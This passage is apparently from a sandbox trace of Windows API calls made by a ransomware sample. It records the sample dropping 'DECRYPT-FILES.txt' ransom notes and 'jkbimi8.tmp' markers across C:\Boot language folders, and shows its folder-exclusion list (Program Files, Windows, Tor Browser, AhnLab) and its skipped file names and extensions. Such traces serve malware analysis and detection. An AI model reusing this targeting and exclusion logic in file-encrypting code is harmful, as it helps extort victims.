lpString1="C:\\Boot\\da-DK\\") returned="C:\\Boot\\da-DK\\" [0071.202] lstrcatW (in: lpString1="C:\\Boot\\da-DK\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\da-DK\\jkbimi8.tmp") returned="C:\\Boot\\da-DK\\jkbimi8.tmp" [0071.202] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.203] CreateFileW (lpFileName="C:\\Boot\\da-DK\\jkbimi8.tmp" (normalized: "c:\\boot\\da-dk\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.203] CloseHandle (hObject=0x0) returned 0 [0071.203] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.203] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.203] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.203] CloseHandle (hObject=0x420) returned 1 [0071.203] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0071.203] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0071.203] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0071.203] lstrcatW (in: lpString1="de-DE", lpString2="\\" | out: lpString1="de-DE\\") returned="de-DE\\" [0071.203] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="de-DE\\" | out: lpString1="C:\\Boot\\de-DE\\") returned="C:\\Boot\\de-DE\\" [0071.203] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Program Files") returned 0x0 [0071.203] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch=":\\Windows") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Games\\") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\All Users") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="AhnLab") returned 0x0 [0071.204] StrStrW (lpFirst="C:\\Boot\\de-DE\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.204] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0071.204] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.204] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\de-DE\\\\jkbimi8.tmp") returned 26 [0071.204] CreateFileW (lpFileName="C:\\Boot\\de-DE\\\\jkbimi8.tmp" (normalized: "c:\\boot\\de-de\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.204] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0071.204] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.204] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\de-DE\\\\DECRYPT-FILES.txt") returned 32 [0071.204] CreateFileW (lpFileName="C:\\Boot\\de-DE\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\de-de\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.205] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.206] CloseHandle (hObject=0x424) returned 1 [0071.206] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0071.206] lstrcatW (in: lpString1="C:\\Boot\\de-DE\\", lpString2="*" | out: lpString1="C:\\Boot\\de-DE\\*") returned="C:\\Boot\\de-DE\\*" [0071.206] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.206] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.206] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.206] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.206] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.206] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.206] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.207] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.207] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.207] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.207] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.207] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.207] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0071.207] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.207] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\de-DE\\" | out: lpString1="C:\\Boot\\de-DE\\") returned="C:\\Boot\\de-DE\\" [0071.207] lstrcatW (in: lpString1="C:\\Boot\\de-DE\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned="C:\\Boot\\de-DE\\bootmgr.exe.mui" [0071.207] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.207] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.207] CloseHandle (hObject=0x0) returned 0 [0071.207] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.207] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.207] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.207] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.207] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.208] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.208] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.208] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.208] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.208] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.208] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.208] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.208] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.208] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.208] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.208] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.208] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.208] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.208] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.208] lstrlenW (lpString="C:\\Boot\\de-DE\\") returned 14 [0071.208] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.208] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\de-DE\\" | out: lpString1="C:\\Boot\\de-DE\\") returned="C:\\Boot\\de-DE\\" [0071.208] lstrcatW (in: lpString1="C:\\Boot\\de-DE\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\de-DE\\jkbimi8.tmp") returned="C:\\Boot\\de-DE\\jkbimi8.tmp" [0071.208] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.208] CreateFileW (lpFileName="C:\\Boot\\de-DE\\jkbimi8.tmp" (normalized: "c:\\boot\\de-de\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.208] CloseHandle (hObject=0x0) returned 0 [0071.208] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.209] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.209] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.209] CloseHandle (hObject=0x420) returned 1 [0071.209] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a2cde0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a2cde0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a2cde0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.209] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.209] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0071.209] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0071.209] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0071.209] lstrcatW (in: lpString1="el-GR", lpString2="\\" | out: lpString1="el-GR\\") returned="el-GR\\" [0071.209] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="el-GR\\" | out: lpString1="C:\\Boot\\el-GR\\") returned="C:\\Boot\\el-GR\\" [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Program Files") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch=":\\Windows") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Games\\") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\All Users") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="AhnLab") returned 0x0 [0071.209] StrStrW (lpFirst="C:\\Boot\\el-GR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.209] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0071.209] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.209] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\el-GR\\\\jkbimi8.tmp") returned 26 [0071.210] CreateFileW (lpFileName="C:\\Boot\\el-GR\\\\jkbimi8.tmp" (normalized: "c:\\boot\\el-gr\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.210] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0071.210] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.210] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\el-GR\\\\DECRYPT-FILES.txt") returned 32 [0071.210] CreateFileW (lpFileName="C:\\Boot\\el-GR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\el-gr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.211] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.212] CloseHandle (hObject=0x424) returned 1 [0071.212] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0071.212] lstrcatW (in: lpString1="C:\\Boot\\el-GR\\", lpString2="*" | out: lpString1="C:\\Boot\\el-GR\\*") returned="C:\\Boot\\el-GR\\*" [0071.212] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.212] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.212] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.212] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.212] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.212] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.212] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.212] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.212] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.212] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.213] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.213] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.213] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0071.213] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.213] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\el-GR\\" | out: lpString1="C:\\Boot\\el-GR\\") returned="C:\\Boot\\el-GR\\" [0071.213] lstrcatW (in: lpString1="C:\\Boot\\el-GR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned="C:\\Boot\\el-GR\\bootmgr.exe.mui" [0071.213] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.213] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.214] CloseHandle (hObject=0x0) returned 0 [0071.214] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.214] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.214] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.214] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.214] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.214] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.214] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.214] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.214] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.214] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.214] lstrlenW (lpString="C:\\Boot\\el-GR\\") returned 14 [0071.214] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.214] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\el-GR\\" | out: lpString1="C:\\Boot\\el-GR\\") returned="C:\\Boot\\el-GR\\" [0071.214] lstrcatW (in: lpString1="C:\\Boot\\el-GR\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\el-GR\\jkbimi8.tmp") returned="C:\\Boot\\el-GR\\jkbimi8.tmp" [0071.215] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.215] CreateFileW (lpFileName="C:\\Boot\\el-GR\\jkbimi8.tmp" (normalized: "c:\\boot\\el-gr\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.215] CloseHandle (hObject=0x0) returned 0 [0071.215] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.215] FindNextFileW (in: 